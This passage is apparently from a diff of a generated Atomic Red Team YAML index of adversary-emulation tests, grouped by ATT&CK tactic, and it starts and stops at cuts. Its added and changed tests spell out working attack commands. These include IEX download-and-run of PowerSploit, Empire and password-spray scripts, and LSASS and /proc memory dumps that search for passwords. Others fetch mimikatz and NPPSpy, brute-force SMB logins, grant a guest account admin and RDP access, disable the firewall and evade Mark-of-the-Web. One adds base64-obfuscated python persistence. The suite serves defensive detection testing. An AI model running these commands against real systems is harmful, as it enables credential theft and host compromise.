           New-Item -ItemType Directory (Split-Path #{dumpert_exe}) -Force | Out-Null
           Invoke-WebRequest "https://github.com/clr2of8/Dumpert/raw/5838c357224cc9bc69618c80c2b5b2d17a394b10/Dumpert/x64/Release/Outflank-Dumpert.exe" -OutFile #{dumpert_exe}
       executor:
@@ -2909,6 +3005,7 @@ credential-access:
 
 '
         get_prereq_command: |
+          [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
           $url = 'https://github.com/gentilkiwi/mimikatz/releases/latest'
           $request = [System.Net.WebRequest]::Create($url)
           $response = $request.GetResponse()
@@ -2992,10 +3089,9 @@ credential-access:
       supported_platforms:
       - windows
       executor:
-        command: 'IEX (New-Object Net.WebClient).DownloadString(''https://raw.githubusercontent.com/mattifestation/PowerSploit/master/Exfiltration/Out-Minidump.ps1'');
-          get-process lsass | Out-Minidump
-
-'
+        command: |
+          [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
+          IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/mattifestation/PowerSploit/master/Exfiltration/Out-Minidump.ps1'); get-process lsass | Out-Minidump
         cleanup_command: 'Remove-Item $env:TEMP\lsass_*.dmp -ErrorAction Ignore
 
 '
@@ -3130,10 +3226,9 @@ credential-access:
         prereq_command: 'if (Test-Path ''#{xordump_exe}'') {exit 0} else {exit 1}
 
 '
-        get_prereq_command: 'Invoke-WebRequest "https://github.com/audibleblink/xordump/releases/download/v0.0.1/xordump.exe"
-          -OutFile #{xordump_exe}
-
-'
+        get_prereq_command: |
+          [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
+          Invoke-WebRequest "https://github.com/audibleblink/xordump/releases/download/v0.0.1/xordump.exe" -OutFile #{xordump_exe}
       executor:
         command: "#{xordump_exe} -out #{output_file} -x 0x41\n"
         cleanup_command: 'Remove-Item ${output_file} -ErrorAction Ignore
@@ -3944,8 +4039,9 @@ credential-access:
       - description: NPPSpy.dll must be available in local temp directory
         prereq_command: if (Test-Path "$env:Temp\NPPSPY.dll") {exit 0} else {exit
           1}
-        get_prereq_command: Invoke-WebRequest -Uri https://github.com/gtworek/PSBits/raw/f221a6db08cb3b52d5f8a2a210692ea8912501bf/PasswordStealing/NPPSpy/NPPSPY.dll
-          -OutFile "$env:Temp\NPPSPY.dll"
+        get_prereq_command: |-
+          [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
+          Invoke-WebRequest -Uri https://github.com/gtworek/PSBits/raw/f221a6db08cb3b52d5f8a2a210692ea8912501bf/PasswordStealing/NPPSpy/NPPSPY.dll -OutFile "$env:Temp\NPPSPY.dll"
       executor:
         command: |-
           Copy-Item "$env:Temp\NPPSPY.dll" -Destination "C:\Windows\System32"
@@ -4273,6 +4369,9 @@ credential-access:
           echo "1q2w3e4r" >> #{input_file_passwords}
           echo "Password!" >> #{input_file_passwords}
           @FOR /F %n in (#{input_file_users}) DO @FOR /F %p in (#{input_file_passwords}) DO @net use #{remote_host} /user:#{domain}\%n %p 1>NUL 2>&1 && @echo [*] %n:%p && @net use /delete #{remote_host} > NUL
+        cleanup_command: |-
+          del #{input_file_users}
+          del #{input_file_passwords}
     - name: Brute Force Credentials of single domain user via LDAP against domain
         controller (NTLM or Kerberos)
       auto_generated_guid: c2969434-672b-4ec8-8df0-bbb91f40e250
@@ -4520,11 +4619,9 @@ credential-access:
       executor:
         name: powershell
         elevation_required: false
-        command: 'IEX (IWR ''https://raw.githubusercontent.com/dafthack/DomainPasswordSpray/94cb72506b9e2768196c8b6a4b7af63cebc47d88/DomainPasswordSpray.ps1''
-          -UseBasicParsing); Invoke-DomainPasswordSpray -Password Spring2017 -Domain
-          #{domain} -Force
-
-'
+        command: |
+          [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
+          IEX (IWR 'https://raw.githubusercontent.com/dafthack/DomainPasswordSpray/94cb72506b9e2768196c8b6a4b7af63cebc47d88/DomainPasswordSpray.ps1' -UseBasicParsing); Invoke-DomainPasswordSpray -Password Spring2017 -Domain #{domain} -Force
     - name: Password spray all domain users with a single password via LDAP against
         domain controller (NTLM or Kerberos)
       auto_generated_guid: f14d956a-5b6e-4a93-847f-0c415142f07d
@@ -4839,7 +4936,106 @@ credential-access:
       x_mitre_is_subtechnique: true
       x_mitre_platforms:
       - Linux
-    atomic_tests: []
+      identifier: T1003.007
+    atomic_tests:
+    - name: Dump individual process memory with sh (Local)
+      auto_generated_guid: 7e91138a-8e74-456d-a007-973d67a0bb80
+      description: |
+        Using `/proc/$PID/mem`, where $PID is the target process ID, use shell utilities to
+        copy process memory to an external file so it can be searched or exfiltrated later.
+      supported_platforms:
+      - linux
+      input_arguments:
+        output_file:
+          description: Path where captured results will be placed
+          type: Path
+          default: "/tmp/T1003.007.bin"
+        script_path:
+          description: Path to script generating the target process
+          type: Path
+          default: "/tmp/T1003.007.sh"
+        pid_term:
+          description: Unique string to use to identify target process
+          type: String
+          default: T1003.007
+      dependencies:
+      - description: 'Script to launch target process must exist
+
+'
+        prereq_command: |
+          test -f #{script_path}
+          grep "#{pid_term}" #{script_path}
+        get_prereq_command: |
+          echo '#!/bin/sh' > #{script_path}
+          echo "sh -c 'echo \"The password is #{pid_term}\" && sleep 30' &" >> #{script_path}
+      executor:
+        name: sh
+        elevation_required: true
+        command: |
+          sh #{script_path}
+          PID=$(pgrep -n -f "#{pid_term}")
+          HEAP_MEM=$(grep -E "^[0-9a-f-]* r" /proc/"$PID"/maps | grep heap | cut -d' ' -f 1)
+          MEM_START=$(echo $((0x$(echo "$HEAP_MEM" | cut -d"-" -f1))))
+          MEM_STOP=$(echo $((0x$(echo "$HEAP_MEM" | cut -d"-" -f2))))
+          MEM_SIZE=$(echo $((0x$MEM_STOP-0x$MEM_START)))
+          dd if=/proc/"${PID}"/mem of="#{output_file}" ibs=1 skip="$MEM_START" count="$MEM_SIZE"
+          grep -i "PASS" "#{output_file}"
+        cleanup_command: 'rm -f "#{output_file}"
+
+'
+    - name: Dump individual process memory with Python (Local)
+      auto_generated_guid: 437b2003-a20d-4ed8-834c-4964f24eec63
+      description: |
+        Using `/proc/$PID/mem`, where $PID is the target process ID, use a Python script to
+        copy a process's heap memory to an external file so it can be searched or exfiltrated later.
+      supported_platforms:
+      - linux
+      input_arguments:
+        output_file:
+          description: Path where captured results will be placed
+          type: Path
+          default: "/tmp/T1003.007.bin"
+        script_path:
+          description: Path to script generating the target process
+          type: Path
+          default: "/tmp/T1003.007.sh"
+        python_script:
+          description: Path to script generating the target process
+          type: Path
+          default: PathToAtomicsFolder/T1003.007/src/dump_heap.py
+        pid_term:
+          description: Unique string to use to identify target process
+          type: String
+          default: T1003.007
+      dependencies:
+      - description: 'Script to launch target process must exist
+
+'
+        prereq_command: |
+          test -f #{script_path}
+          grep "#{pid_term}" #{script_path}
+        get_prereq_command: |
+          echo '#!/bin/sh' > #{script_path}
+          echo "sh -c 'echo \"The password is #{pid_term}\" && sleep 30' &" >> #{script_path}
+      - description: 'Requires Python
+
+'
+        prereq_command: "(which python || which python3 || which python2)\n"
+        get_prereq_command: 'echo "Python 2.7+ or 3.4+ must be installed"
+
+'
+      executor:
+        name: sh
+        elevation_required: true
+        command: |
+          sh #{script_path}
+          PID=$(pgrep -n -f "#{pid_term}")
+          PYTHON=$(which python || which python3 || which python2)
+          $PYTHON #{python_script} $PID #{output_file}
+          grep -i "PASS" "#{output_file}"
+        cleanup_command: 'rm -f "#{output_file}"
+
+'
   T1606.002:
     technique:
       external_references:
@@ -6735,8 +6931,9 @@ collection:
 '
       executor:
         command: |
+          [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
           Set-Clipboard -value "Atomic T1115 Test, grab data from clipboard via VBA"
-          IEX (iwr "https://raw.githubusercontent.com/redcanaryco/invoke-atomicredteam/master/Public/Invoke-MalDoc.ps1" -UseBasicParsing)
+          IEX (iwr "https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1204.002/src/Invoke-MalDoc.ps1" -UseBasicParsing)
           Invoke-Maldoc -macroFile "PathToAtomicsFolder\T1115\src\T1115-macrocode.txt" -officeProduct "Word" -sub "GetClipboard"
         cleanup_command: 'Remove-Item "$env:TEMP\atomic_T1115_clipboard_data.txt"
           -ErrorAction Ignore
@@ -9155,7 +9352,8 @@ privilege-escalation:
         computer starts up various applications and may in fact drive you crazy. A
         reliable way to make the message box appear and verify the \nAppInit Dlls
         are loading is to start the notepad application. Be sure to run the cleanup
-        commands afterwards so you don't keep getting message boxes showing up\n"
+        commands afterwards so you don't keep getting message boxes showing up.\n\nNote:
+        If secure boot is enabled, this technique will not work. https://docs.microsoft.com/en-us/windows/win32/dlls/secure-boot-and-appinit-dlls\n"
       supported_platforms:
       - windows
       input_arguments:
@@ -11235,9 +11433,9 @@ privilege-escalation:
     atomic_tests:
     - name: Enable Guest account with RDP capability and admin priviliges
       auto_generated_guid: 99747561-ed8d-47f2-9c91-1e5fde1ed6e0
-      description: After execution the Default Guest account will be enabled (Active)
-        and added to Administrators and Remote Desktop Users Group, and desktop will
-        allow multiple RDP connections
+      description: |
+        After execution the Default Guest account will be enabled (Active) and added to Administrators and Remote Desktop Users Group,
+        and desktop will allow multiple RDP connections.
       supported_platforms:
       - windows
       input_arguments:
@@ -11249,6 +11447,10 @@ privilege-escalation:
           description: Specify the guest password
           type: String
           default: Password123!
+        remove_rdp_access_during_cleanup:
+          description: Set to 1 if you want the cleanup to remove RDP access to machine
+          type: Integer
+          default: 0
       executor:
         command: |-
           net user #{guest_user} /active:yes
@@ -11261,8 +11463,9 @@ privilege-escalation:
           net user #{guest_user} /active:no >nul 2>&1
           net localgroup administrators #{guest_user} /delete >nul 2>&1
           net localgroup "Remote Desktop Users" #{guest_user} /delete >nul 2>&1
-          reg delete "hklm\system\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /f >nul 2>&1
-          reg delete "hklm\system\CurrentControlSet\Control\Terminal Server" /v "AllowTSConnections" /f >nul 2>&1
+          if #{remove_rdp_access_during_cleanup} NEQ 1 (echo Note: set remove_rdp_access_during_cleanup input argument to disable RDP access during cleanup)
+          if #{remove_rdp_access_during_cleanup} EQU 1 (reg delete "hklm\system\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /f >nul 2>&1)
+          if #{remove_rdp_access_during_cleanup} EQU 1 (reg delete "hklm\system\CurrentControlSet\Control\Terminal Server" /v "AllowTSConnections" /f >nul 2>&1)
         name: command_prompt
         elevation_required: true
   T1078.002:
@@ -15033,7 +15236,8 @@ privilege-escalation:
 
 '
       executor:
-        command: "IEX (iwr \"https://raw.githubusercontent.com/redcanaryco/invoke-atomicredteam/master/Public/Invoke-MalDoc.ps1\"
+        command: "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12\nIEX
+          (iwr \"https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1204.002/src/Invoke-MalDoc.ps1\"
           -UseBasicParsing) \nInvoke-MalDoc -macroFile \"PathToAtomicsFolder\\T1055.012\\src\\T1055.012-macrocode.txt\"
           -officeProduct \"#{ms_product}\" -sub \"Exploit\"\n"
         name: powershell
@@ -15167,7 +15371,8 @@ privilege-escalation:
 '
       executor:
         command: |
-          IEX (iwr "https://raw.githubusercontent.com/redcanaryco/invoke-atomicredteam/master/Public/Invoke-MalDoc.ps1" -UseBasicParsing)
+          [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
+          IEX (iwr "https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1204.002/src/Invoke-MalDoc.ps1" -UseBasicParsing)
           Invoke-Maldoc -macroFile "PathToAtomicsFolder\T1055\src\x64\T1055-macrocode.txt" -officeProduct "Word" -sub "Execute"
         name: powershell
     - name: Remote Process Injection in LSASS via mimikatz
@@ -15203,6 +15408,7 @@ privilege-escalation:
           if (Test-Path $mimikatz_path) {exit 0} else {exit 1}
         get_prereq_command: |
           $mimikatz_path = cmd /c echo #{mimikatz_path}
+          [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
           Invoke-WebRequest "https://github.com/gentilkiwi/mimikatz/releases/download/2.2.0-20200918-fix/mimikatz_trunk.zip" -OutFile "$env:TEMP\mimikatz.zip"
           Expand-Archive $env:TEMP\mimikatz.zip $env:TEMP\mimikatz -Force
           New-Item -ItemType Directory (Split-Path $mimikatz_path) -Force | Out-Null
@@ -15215,6 +15421,7 @@ privilege-escalation:
 
 '
         get_prereq_command: |
+          [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
           Invoke-WebRequest "https://download.sysinternals.com/files/PSTools.zip" -OutFile "$env:TEMP\PsTools.zip"
           Expand-Archive $env:TEMP\PsTools.zip $env:TEMP\PsTools -Force
           New-Item -ItemType Directory (Split-Path "#{psexec_path}") -Force | Out-Null
@@ -16060,7 +16267,8 @@ privilege-escalation:
 
 '
       executor:
-        command: "IEX (iwr \"https://raw.githubusercontent.com/redcanaryco/invoke-atomicredteam/master/Public/Invoke-MalDoc.ps1\"
+        command: "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12\nIEX
+          (iwr \"https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1204.002/src/Invoke-MalDoc.ps1\"
           -UseBasicParsing) \nInvoke-MalDoc -macroFile \"PathToAtomicsFolder\\T1053.005\\src\\T1053.005-macrocode.txt\"
           -officeProduct \"#{ms_product}\" -sub \"Scheduler\"\n"
         name: powershell
@@ -17073,6 +17281,48 @@ privilege-escalation:
           rm -rf #{systemd_service_path}/#{systemd_service_file}
           systemctl daemon-reload
         name: bash
+    - name: Create Systemd Service file,  Enable the service , Modify and Reload the
+        service.
+      auto_generated_guid: c35ac4a8-19de-43af-b9f8-755da7e89c89
+      description: "This test creates a systemd service unit file and enables it to
+        autostart on boot. Once service is created and enabled, it also modifies this
+        same service file showcasing both Creation and Modification of system process.
+        \n"
+      supported_platforms:
+      - linux
+      dependencies:
+      - description: 'System must be Ubuntu ,Kali OR CentOS.
+
+'
+        prereq_command: 'if [ $(cat /etc/os-release | grep -i ID=ubuntu) ] || [ $(cat
+          /etc/os-release | grep -i ID=kali) ] || [ $(cat /etc/os-release | grep -i
+          ''ID="centos"'') ]; then exit /b 0; else exit /b 1; fi;
+
+'
+        get_prereq_command: 'echo Please run from Ubuntu ,Kali OR CentOS.
+
+'
+      executor:
+        name: bash
+        elevation_required: true
+        command: "cat > /etc/init.d/T1543.002 << EOF\n#!/bin/bash\n### BEGIN INIT
+          INFO\n# Provides : Atomic Test T1543.002\n# Required-Start: $all\n# Required-Stop
+          : \n# Default-Start: 2 3 4 5\n# Default-Stop: \n# Short Description: Atomic
+          Test for Systemd Service Creation\n### END INIT INFO\npython3 -c \"import
+          os, base64;exec(base64.b64decode('aW1wb3J0IG9zCm9zLnBvcGVuKCdlY2hvIGF0b21pYyB0ZXN0IGZvciBDcmVhdGluZyBTeXN0ZW1kIFNlcnZpY2UgVDE1NDMuMDAyID4gL3RtcC9UMTU0My4wMDIuc3lzdGVtZC5zZXJ2aWNlLmNyZWF0aW9uJykK'))\"\nEOF\n\nchmod
+          +x /etc/init.d/T1543.002\nif [ $(cat /etc/os-release | grep -i ID=ubuntu)
+          ] || [ $(cat /etc/os-release | grep -i ID=kali) ]; then update-rc.d T1543.002
+          defaults; elif [ $(cat /etc/os-release | grep -i 'ID=\"centos\"') ]; then
+          chkconfig T1543.002 on ; else echo \"Please run this test on Ubnutu , kali
+          OR centos\" ; fi ;\nsystemctl enable T1543.002\nsystemctl start T1543.002\n\necho
+          \"python3 -c \\\"import os, base64;exec(base64.b64decode('aW1wb3J0IG9zCm9zLnBvcGVuKCdlY2hvIGF0b21pYyB0ZXN0IGZvciBtb2RpZnlpbmcgYSBTeXN0ZW1kIFNlcnZpY2UgVDE1NDMuMDAyID4gL3RtcC9UMTU0My4wMDIuc3lzdGVtZC5zZXJ2aWNlLm1vZGlmaWNhdGlvbicpCg=='))\\\"\"
+          | sudo tee -a /etc/init.d/T1543.002\nsystemctl daemon-reload\nsystemctl
+          restart T1543.002\n"
+        cleanup_command: |
+          systemctl stop T1543.002
+          systemctl disable T1543.002
+          rm -rf /etc/init.d/T1543.002
+          systemctl daemon-reload
   T1053.006:
     technique:
       id: attack-pattern--a542bac9-7bc1-4da7-9a09-96f69e23cc21
@@ -17442,8 +17692,9 @@ privilege-escalation:
       supported_platforms:
       - windows
       executor:
-        command: IEX (IWR 'https://raw.githubusercontent.com/BC-SECURITY/Empire/f6efd5a963d424a1f983d884b637da868e5df466/data/module_source/privesc/Get-System.ps1'
-          -UseBasicParsing); Get-System -Technique NamedPipe -Verbose
+        command: |
+          [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
+          IEX (IWR 'https://raw.githubusercontent.com/BC-SECURITY/Empire/f6efd5a963d424a1f983d884b637da868e5df466/data/module_source/privesc/Get-System.ps1' -UseBasicParsing); Get-System -Technique NamedPipe -Verbose
         name: powershell
         elevation_required: true
     - name: "`SeDebugPrivilege` token duplication"
@@ -17454,8 +17705,9 @@ privilege-escalation:
       supported_platforms:
       - windows
       executor:
-        command: IEX (IWR 'https://raw.githubusercontent.com/BC-SECURITY/Empire/f6efd5a963d424a1f983d884b637da868e5df466/data/module_source/privesc/Get-System.ps1'
-          -UseBasicParsing); Get-System -Technique Token -Verbose
+        command: |
+          [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
+          IEX (IWR 'https://raw.githubusercontent.com/BC-SECURITY/Empire/f6efd5a963d424a1f983d884b637da868e5df466/data/module_source/privesc/Get-System.ps1' -UseBasicParsing); Get-System -Technique Token -Verbose
         name: powershell
         elevation_required: true
   T1546.005:
@@ -18861,7 +19113,7 @@ defense-evasion:
         command: |
           bitsadmin.exe /create #{bits_job_name}
           bitsadmin.exe /addfile #{bits_job_name} #{remote_file} #{local_file}
-          bitsadmin.exe /setnotifycmdline #{bits_job_name} #{command_path} ""
+          bitsadmin.exe /setnotifycmdline #{bits_job_name} #{command_path} NULL
           bitsadmin.exe /resume #{bits_job_name}
           timeout 5
           bitsadmin.exe /complete #{bits_job_name}
@@ -20202,7 +20454,8 @@ defense-evasion:
 '
       executor:
         command: |
-          IEX (iwr "https://raw.githubusercontent.com/redcanaryco/invoke-atomicredteam/master/Public/Invoke-MalDoc.ps1" -UseBasicParsing)
+          [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
+          IEX (iwr "https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1204.002/src/Invoke-MalDoc.ps1" -UseBasicParsing)
           Invoke-Maldoc -macroFile "PathToAtomicsFolder\T1070.001\src\T1070.001-macrocode.txt" -officeProduct "Word" -sub "ClearLogs"
         name: powershell
         elevation_required: true
@@ -21404,9 +21657,9 @@ defense-evasion:
     atomic_tests:
     - name: Enable Guest account with RDP capability and admin priviliges
       auto_generated_guid: 99747561-ed8d-47f2-9c91-1e5fde1ed6e0
-      description: After execution the Default Guest account will be enabled (Active)
-        and added to Administrators and Remote Desktop Users Group, and desktop will
-        allow multiple RDP connections
+      description: |
+        After execution the Default Guest account will be enabled (Active) and added to Administrators and Remote Desktop Users Group,
+        and desktop will allow multiple RDP connections.
       supported_platforms:
       - windows
       input_arguments:
@@ -21418,6 +21671,10 @@ defense-evasion:
           description: Specify the guest password
           type: String
           default: Password123!
+        remove_rdp_access_during_cleanup:
+          description: Set to 1 if you want the cleanup to remove RDP access to machine
+          type: Integer
+          default: 0
       executor:
         command: |-
           net user #{guest_user} /active:yes
@@ -21430,8 +21687,9 @@ defense-evasion:
           net user #{guest_user} /active:no >nul 2>&1
           net localgroup administrators #{guest_user} /delete >nul 2>&1
           net localgroup "Remote Desktop Users" #{guest_user} /delete >nul 2>&1
-          reg delete "hklm\system\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /f >nul 2>&1
-          reg delete "hklm\system\CurrentControlSet\Control\Terminal Server" /v "AllowTSConnections" /f >nul 2>&1
+          if #{remove_rdp_access_during_cleanup} NEQ 1 (echo Note: set remove_rdp_access_during_cleanup input argument to disable RDP access during cleanup)
+          if #{remove_rdp_access_during_cleanup} EQU 1 (reg delete "hklm\system\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /f >nul 2>&1)
+          if #{remove_rdp_access_during_cleanup} EQU 1 (reg delete "hklm\system\CurrentControlSet\Control\Terminal Server" /v "AllowTSConnections" /f >nul 2>&1)
         name: command_prompt
         elevation_required: true
   T1578.003:
@@ -22147,6 +22405,23 @@ defense-evasion:
 '
         cleanup_command: 'netsh advfirewall set currentprofile state on >nul 2>&1
 
+'
+        name: command_prompt
+    - name: Disable Microsoft Defender Firewall via Registry
+      auto_generated_guid: afedc8c4-038c-4d82-b3e5-623a95f8a612
+      description: |
+        Disables the Microsoft Defender Firewall for the public profile via registry
+        Caution if you access remotely the host where the test runs! Especially with the cleanup command which will re-enable firewall for the current profile...
+      supported_platforms:
+      - windows
+      executor:
+        command: 'reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\PublicProfile"
+          /v "EnableFirewall" /t REG_DWORD /d 0 /f
+
+'
+        cleanup_command: 'reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\PublicProfile"
+          /v "EnableFirewall" /t REG_DWORD /d 1 /f
+
 '
         name: command_prompt
     - name: Allow SMB and RDP on Microsoft Defender Firewall
@@ -25023,13 +25298,14 @@ defense-evasion:
         command: |
           $macro = [System.IO.File]::ReadAllText("PathToAtomicsFolder\T1564\src\T1564-macrocode.txt")
           $macro = $macro -replace "aREPLACEMEa", "PathToAtomicsFolder\T1564\bin\extractme.bin"
-          IEX (iwr "https://raw.githubusercontent.com/redcanaryco/invoke-atomicredteam/master/Public/Invoke-MalDoc.ps1" -UseBasicParsing)
+          [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
+          IEX (iwr "https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1204.002/src/Invoke-MalDoc.ps1" -UseBasicParsing)
           Invoke-Maldoc -macroCode "$macro" -officeProduct "Word" -sub "Extract" -NoWrap
         cleanup_command: 'Remove-Item "$env:TEMP\extracted.exe" -ErrorAction Ignore
 
 '
         name: powershell
-    - name: Create a user called "$" as noted here
+    - name: Create a Hidden User Called "$"
       auto_generated_guid: 2ec63cc2-4975-41a6-bf09-dffdfb610778
       description: Creating a user with a username containing "$"
       supported_platforms:
@@ -27174,7 +27450,78 @@ defense-evasion:
       x_mitre_version: '1.0'
       x_mitre_defense_bypassed:
       - Anti-virus, Application control
-    atomic_tests: []
+      identifier: T1553.005
+    atomic_tests:
+    - name: Mount ISO image
+      auto_generated_guid: 002cca30-4778-4891-878a-aaffcfa502fa
+      description: 'Mounts ISO image downloaded from internet to evade Mark-of-the-Web.
+        Upon successful execution, powershell will download the .iso from the Atomic
+        Red Team repo, and mount the image. The provided sample ISO simply has a Reports
+        shortcut file in it. Reference: https://www.microsoft.com/security/blog/2021/05/27/new-sophisticated-email-based-attack-from-nobelium/
+
+'
+      supported_platforms:
+      - windows
+      input_arguments:
+        path_of_iso:
+          description: Path to ISO file
+          type: path
+          default: PathToAtomicsFolder\T1553.005\bin\T1553.005.iso
+      dependency_executor_name: powershell
+      dependencies:
+      - description: 'T1553.005.iso must exist on disk at specified location (#{path_of_iso})
+
+'
+        prereq_command: 'if (Test-Path #{path_of_iso}) {exit 0} else {exit 1}
+
+'
+        get_prereq_command: |
+          New-Item -Type Directory (split-path #{path_of_iso}) -ErrorAction ignore | Out-Null
+          Invoke-WebRequest https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1553.005/bin/T1553.005.iso -OutFile "#{path_of_iso}"
+      executor:
+        command: 'Mount-DiskImage -ImagePath "#{path_of_iso}"
+
+'
+        cleanup_command: 'Dismount-DiskImage -ImagePath "#{path_of_iso}" | Out-Null
+
+'
+        name: powershell
+    - name: Mount an ISO image and run executable from the ISO
+      auto_generated_guid: 42f22b00-0242-4afc-a61b-0da05041f9cc
+      description: "Mounts an ISO image downloaded from internet to evade Mark-of-the-Web
+        and run hello.exe executable from the ISO. \nUpon successful execution, powershell
+        will download the .iso from the Atomic Red Team repo, mount the image, and
+        run the executable from the ISO image that will open command prompt echoing
+        \"Hello, World!\". \nISO provided by:https://twitter.com/mattifestation/status/1398323532988399620
+        Reference:https://www.microsoft.com/security/blog/2021/05/27/new-sophisticated-email-based-attack-from-nobelium/,
+        \ "
+      supported_platforms:
+      - windows
+      input_arguments:
+        path_of_iso:
+          description: Path to ISO file
+          type: path
+          default: PathToAtomicsFolder\T1553.005\bin\FeelTheBurn.iso
+      dependency_executor_name: powershell
+      dependencies:
+      - description: 'FeelTheBurn.iso must exist on disk at specified location (#{path_of_iso})
+
+'
+        prereq_command: 'if (Test-Path #{path_of_iso}) {exit 0} else {exit 1}
+
+'
+        get_prereq_command: |
+          New-Item -Type Directory (split-path #{path_of_iso}) -ErrorAction ignore | Out-Null
+          Invoke-WebRequest https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1553.005/bin/FeelTheBurn.iso -OutFile "#{path_of_iso}"
+      executor:
+        command: |
+          $keep = Mount-DiskImage -ImagePath "#{path_of_iso}" -StorageType ISO -Access ReadOnly
+          $driveLetter = ($keep | Get-Volume).DriveLetter
+          invoke-item "$($driveLetter):\hello.exe"
+        cleanup_command: |
+          Dismount-DiskImage -ImagePath "#{path_of_iso}" | Out-Null
+          Stop-process -name "hello" -Force -ErrorAction ignore
+        name: powershell
   T1036.004:
     technique:
       external_references:
@@ -27406,7 +27753,33 @@ defense-evasion:
       x_mitre_contributors:
       - Yossi Weizman, Azure Defender Research Team
       - Vishwas Manral, McAfee
-    atomic_tests: []
+      identifier: T1036.005
+    atomic_tests:
+    - name: Execute a process from a directory masquerading as the current parent
+        directory.
+      auto_generated_guid: 812c3ab8-94b0-4698-a9bf-9420af23ce24
+      description: 'Create and execute a process from a directory masquerading as
+        the current parent directory (`...` instead of normal `..`)
+
+'
+      supported_platforms:
+      - macos
+      - linux
+      input_arguments:
+        test_message:
+          description: Test message to echo out to the screen
+          type: String
+          default: Hello from the Atomic Red Team test T1036.005#1
+      executor:
+        name: sh
+        elevation_required: false
+        command: |
+          mkdir $HOME/...
+          cp $(which sh) $HOME/...
+          $HOME/.../sh -c "echo #{test_message}"
+        cleanup_command: |
+          rm -f $HOME/.../sh
+          rmdir $HOME/.../
   T1556:
     technique:
       external_references:
@@ -30570,7 +30943,8 @@ defense-evasion:
 
 '
       executor:
-        command: "IEX (iwr \"https://raw.githubusercontent.com/redcanaryco/invoke-atomicredteam/master/Public/Invoke-MalDoc.ps1\"
+        command: "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12\nIEX
+          (iwr \"https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1204.002/src/Invoke-MalDoc.ps1\"
           -UseBasicParsing) \nInvoke-MalDoc -macroFile \"PathToAtomicsFolder\\T1055.012\\src\\T1055.012-macrocode.txt\"
           -officeProduct \"#{ms_product}\" -sub \"Exploit\"\n"
         name: powershell
@@ -30704,7 +31078,8 @@ defense-evasion:
 '
       executor:
         command: |
-          IEX (iwr "https://raw.githubusercontent.com/redcanaryco/invoke-atomicredteam/master/Public/Invoke-MalDoc.ps1" -UseBasicParsing)
+          [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
+          IEX (iwr "https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1204.002/src/Invoke-MalDoc.ps1" -UseBasicParsing)
           Invoke-Maldoc -macroFile "PathToAtomicsFolder\T1055\src\x64\T1055-macrocode.txt" -officeProduct "Word" -sub "Execute"
         name: powershell
     - name: Remote Process Injection in LSASS via mimikatz
@@ -30740,6 +31115,7 @@ defense-evasion:
           if (Test-Path $mimikatz_path) {exit 0} else {exit 1}
         get_prereq_command: |
           $mimikatz_path = cmd /c echo #{mimikatz_path}
+          [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
           Invoke-WebRequest "https://github.com/gentilkiwi/mimikatz/releases/download/2.2.0-20200918-fix/mimikatz_trunk.zip" -OutFile "$env:TEMP\mimikatz.zip"
           Expand-Archive $env:TEMP\mimikatz.zip $env:TEMP\mimikatz -Force
           New-Item -ItemType Directory (Split-Path $mimikatz_path) -Force | Out-Null
@@ -30752,6 +31128,7 @@ defense-evasion:
 
 '
         get_prereq_command: |
+          [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
           Invoke-WebRequest "https://download.sysinternals.com/files/PSTools.zip" -OutFile "$env:TEMP\PsTools.zip"
           Expand-Archive $env:TEMP\PsTools.zip $env:TEMP\PsTools -Force
           New-Item -ItemType Directory (Split-Path "#{psexec_path}") -Force | Out-Null
@@ -34247,30 +34624,26 @@ defense-evasion:
     atomic_tests:
     - name: WINWORD Remote Template Injection
       auto_generated_guid: 1489e08a-82c7-44ee-b769-51b72d03521d
-      description: 'Open a .docx file that loads a remote .dotm macro enabled template.
-        Executes the code specified within the .dotm template.Requires download of
-        WINWORD found in Microsoft Ofiice at Microsoft: https://www.microsoft.com/en-us/download/office.aspx.  Opens
-        Calculator.exe when test sucessfully executed, while AV turned off.
-
-'
+      description: "Open a .docx file that loads a remote .dotm macro enabled template
